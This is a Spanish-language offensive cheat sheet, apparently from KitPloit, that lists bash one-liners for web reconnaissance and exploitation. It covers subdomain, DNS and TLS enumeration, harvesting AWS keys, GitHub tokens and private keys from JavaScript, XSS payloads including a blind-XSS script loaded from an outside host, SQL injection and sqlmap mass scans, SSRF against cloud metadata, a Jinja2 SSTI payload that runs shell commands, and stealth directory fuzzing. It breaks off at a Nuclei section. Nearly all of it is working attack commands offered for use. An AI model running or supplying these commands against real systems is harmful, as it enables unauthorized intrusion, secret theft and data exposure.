curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

root@kitploit:~
### 💀 Subdominios de Wayback Machine```bash
# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 Extracción de CommonCrawl```bash

☠️ CommonCrawl subdomain extraction

curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's//.*//g' | sort -u | anew commoncrawl_subs.txt

root@kitploit:~
### 💀 Subdominios de VirusTotal```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 Intento de Transferencia de Zona DNS```bash

☠️ Check for zone transfer vulnerability

dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/.$//' | anew zone_transfer.txt

root@kitploit:~
### 💀 Búsqueda inversa de IP```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN Range Scanner```bash

☠️ Get ASN and scan all IP ranges

whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

root@kitploit:~
### 💀 Registros PTR desde un Rango IP```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 Todo-en-Uno Mega Oneliner```bash

☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️

(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/*.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's//.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

root@kitploit:~
### 💀 Permutación/Fuerza Bruta de Subdominios```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 Fuerza bruta de lista de palabras DNS con PureDNS```bash

☠️ Fast bruteforce with PureDNS

puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

root@kitploit:~
### 💀 Capturador de Certificados TLS/SSL```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan```bash

☠️ Find related hosts via favicon hash

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

root@kitploit:~
### 💀 Descubrimiento de Subdominios con Google Dorks```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

🔐 Reconocimiento TLS/SSL (TLSX)

``` ████████╗██╗ ███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ╚══██╔══╝██║ ██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║ ███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║ ╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██║ ███████╗███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🔐 Inteligencia de Certificados TLS/SSL con TLSX 🔐**

🔐 Escaneo Básico de Certificados TLS```bash

🔐 Full TLS certificate details extraction

echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

root@kitploit:~
### 🔐 Descubrimiento de subdominios a través de SANs```bash
# 🔐 Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

🔐 Cazador de Certificados Caducados```bash

🔐 Find hosts with expired SSL certificates

cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

root@kitploit:~
### 🔐 Detección de Certificado Autofirmado```bash
# 🔐 Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

🔐 Enumeración de versiones TLS (TLS débil)```bash

🔐 Find hosts with deprecated TLS versions (TLS 1.0/1.1)

cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

root@kitploit:~
### 🔐 Pipeline de Huellas Digitales JARM```bash
# 🔐 JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

🔐 Cadena de Certificados y Análisis del Emisor```bash

🔐 Analyze certificate chain and identify CA

cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

root@kitploit:~
### 🔐 Escaneo Masivo de TLS con Enumeración de Cifrados```bash
# 🔐 Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

🔐 Detección de Certificados No Coincidentes```bash

🔐 Find certificates where CN doesn't match the hostname

cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

root@kitploit:~
### 🔐 Pipeline definitivo de reconocimiento TLS```bash
# 🔐 Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json

🌐 DNS Intelligence (DNSX)

``` ██████╗ ███╗ ██╗███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ██╔══██╗████╗ ██║██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║██╔██╗ ██║███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║██║╚██╗██║╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██████╔╝██║ ╚████║███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🌐 Reconocimiento DNS y recolección de inteligencia con DNSX 🌐**

🌐 1. Resolución masiva de DNS + Filtrado de comodines```bash

🌐 Resolve subdomains and filter out wildcards

subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt

root@kitploit:~
### 🌐 2. Enumeración de DNS de múltiples tipos de registros```bash
# 🌐 Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt

🌐 3. Extracción de CNAME para Toma de Subdominio```bash

🌐 Find dangling CNAMEs pointing to vulnerable services

subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt

root@kitploit:~
### 🌐 4. DNS inverso (PTR) en rangos IP```bash
# 🌐 Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt

🌐 5. MX Records para el Análisis de Seguridad del Correo Electrónico```bash

🌐 Extract MX records to identify mail servers and SPF bypass opportunities

cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt

root@kitploit:~
### 🌐 6. Registros NS + Verificación de Transferencia de Zona DNS```bash
# 🌐 Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt

🌐 7. DNS Fuerza Bruta con Resolvers Personalizados```bash

🌐 Mass DNS brute-force with custom resolver list

cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt

root@kitploit:~
### 🌐 8. Salida JSON para Parseo Avanzado```bash
# 🌐 Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json

🌐 9. Descubrimiento de ASN mediante correlación DNS + IP```bash

🌐 Resolve domains, extract unique IPs, and identify ASN ownership

subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt

root@kitploit:~
### 🌐 10. Pipeline Definitivo de Reconocimiento DNS```bash
# 🌐 Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"

🎯 Consejo profesional: Use resolvedores personalizados para un mejor rendimiento: dnsx -r resolvers.txt -rl 1000


📜 Reconocimiento de JavaScript

Pipeline JS completo```bash

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '.js$' | anew js.txt

root@kitploit:~
### Extraer Secretos de JS```bash
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder en archivos JS```bash

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

root@kitploit:~
### SecretFinder Escaneo Masivo```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

Extracción de Variables JS```bash

cat file.js | grep -oE "var\s+\w+\s*=\s*['"][^'"]+['"]" | sort -u

root@kitploit:~
### Claves de API desde JS```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extraer todas las URLs de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^"'`\s<>]+)" | sort -u | anew js_urls.txt

root@kitploit:~
### Encontrar endpoints de API en JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extraer credenciales hardcodeadas```bash

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

root@kitploit:~
### Extraer claves de AWS de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extraer claves de API de Google de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z-_]{35}" | sort -u | anew google_api_keys.txt

root@kitploit:~
### Extraer URLs de Firebase de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extraer buckets S3 de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+.s3.amazonaws.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+.amazonaws.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

root@kitploit:~
### Extraer IPs internas de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extraer Slack Webhooks de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

root@kitploit:~
### Extraer GitHub Tokens de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extraer claves privadas de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

root@kitploit:~
### Extraer direcciones de correo electrónico de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extraer subdominios ocultos de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+.[a-zA-Z]{2,}" | sed 's|https?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

root@kitploit:~
### 💀 Extraer Endpoints de GraphQL de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extraer tokens JWT de archivos JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

root@kitploit:~
### 💀 Encontrar Mapas de Fuente de Webpack```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extraer Webhooks de Discord desde JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

root@kitploit:~
### 💀 Encuentra Rutas de Administración Ocultas en JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 Detección de XSS

Dalfox Pipeline```bash

cat urls.txt | gf xss | uro | qsreplace '">' | dalfox pipe --silence --skip-bav

root@kitploit:~
### XSS Ciego con Callback```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan```bash

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)"

root@kitploit:~
### Knoxss API```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

Detección de DOM XSS```bash

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval(|.write()" && echo "--- @ ---"'

root@kitploit:~
### XSS masivo con Nuclei DAST```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Detección de Parámetros Reflejados```bash

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

root@kitploit:~
### Pruebas de Políglotas XSS```bash
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ Inyección SQL

Escaneo masivo de SQLMap```bash

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

root@kitploit:~
### Detección Basada en Errores```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Ciego basado en tiempo```bash

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

root@kitploit:~
### Escaneo Ghauri```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

Detección de UNION```bash

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

root@kitploit:~
### Detección basada en booleanos```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

Inyección NoSQL```bash

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

root@kitploit:~
---

## 🌐 SSRF y SSTI

### SSRF con Interactsh```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

Fuzzing de parámetros SSRF```bash

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

root@kitploit:~
### Detección de SSTI```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

Prueba de Payload SSTI```bash

cat urls.txt | qsreplace '${77}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 77 %>' | httpx -silent -mr "49"

root@kitploit:~
### Cadena SSRF completa```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF con DNS Rebinding```bash

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

root@kitploit:~
### Jinja2 SSTI```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Rastreo web

Katana Deep Crawl```bash

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

root@kitploit:~
### Gospider Rastreo Completo```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler con Scope```bash

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

root@kitploit:~
### ParamSpider Discovery```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore URLs históricas```bash

waymore -i target.com -mode U -oU urls.txt

root@kitploit:~
### Rastrear con navegador headless```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extraer Formularios```bash

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

root@kitploit:~
### 💀 Katana Rastreo Profundo Multiobjetivo + Análisis de JS```bash
# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

💀 Gospider Recursivo + Sitemap + Robots```bash

☠️ Full crawl with sitemap parsing and robots.txt extraction

gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

root@kitploit:~
### 💀 Hakrawler + Wayback + GAU Combined Crawler```bash
# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

💀 Katana Headless + Form Autofill + Screenshot```bash

☠️ Headless browser crawl with form interaction and XHR capture

katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

root@kitploit:~
### 💀 Cariddi Rastreo Completo con Detección de Secretos```bash
# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

💀 Pipeline de Rastreo de Dominio Paralelo```bash

☠️ Mass parallel crawling with deduplication

cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

root@kitploit:~
### 💀 Katana + Gospider + LinkFinder Cadena```bash
# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

💀 Rastreo Recursivo + Pipeline de Escaneo Automático con Nuclei```bash

☠️ Crawl then auto-scan discovered endpoints for vulnerabilities

katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E ".(php|asp|aspx|jsp|do|action)(?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

root@kitploit:~
### 💀 Waymore + Katana Histórico + Fusión en Vivo```bash
# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

💀 Deduplicación de Salida del Multirrastreador + Extracción de Parámetros```bash

☠️ Run all crawlers and extract unique parameters

(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

root@kitploit:~
---

## 🔑 Descubrimiento de Parámetros

### Parámetros Ocultos X8```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery```bash

arjun -i urls.txt -oT arjun_params.txt --stable

root@kitploit:~
### Bruteforce de Parámetros Personalizados```bash
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Extraer parámetros de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

root@kitploit:~
### Prueba de Contaminación de Parámetros```bash
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Descubrimiento de Contenido

Ffuf Fuerza Bruta de Directorios```bash

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

root@kitploit:~
### 💀 Fuzzing Recursivo - ffuf Escaneo Profundo```bash
# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Escaneo Recursivo Completo de Feroxbuster```bash

☠️ Deep recursive scan with auto-tune and smart filtering

feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

root@kitploit:~
### 💀 Feroxbuster Multi-Objetivo Recursivo```bash
# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 ffuf + Feroxbuster Pipeline (Extensiones + Recursión)```bash

☠️ Find directories with ffuf, then deep scan each with feroxbuster

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

root@kitploit:~
### 💀 Fuzzing Recursivo con Escaneo Masivo de Extensiones```bash
# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Escaneo Recursivo Paralelo```bash

☠️ Parallel scan with multiple wordlists and extensions

feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

root@kitploit:~
### 💀 Feroxbuster Recursivo Silencioso + Cabeceras```bash
# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extraer Enlaces + Recursivo```bash

☠️ Extract links from responses and add to scan queue recursively

feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

root@kitploit:~
### 💀 Reanudar Feroxbuster + Filtrar por Tamaño```bash
# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Descubrimiento de Endpoints de la API de Feroxbuster```bash

☠️ Recursive API fuzzing with JSON content-type

feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

root@kitploit:~
### Exposición de Git```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Archivos Sensibles```bash

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

root@kitploit:~
### Archivos de Respaldo```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

Documentación de la API```bash

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

root@kitploit:~
### Filtración de código fuente```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Archivos de Configuración```bash

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

root@kitploit:~
### Archivos de base de datos```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Escaneo con Nuclei

Escaneo Completo de Plantillas```bash

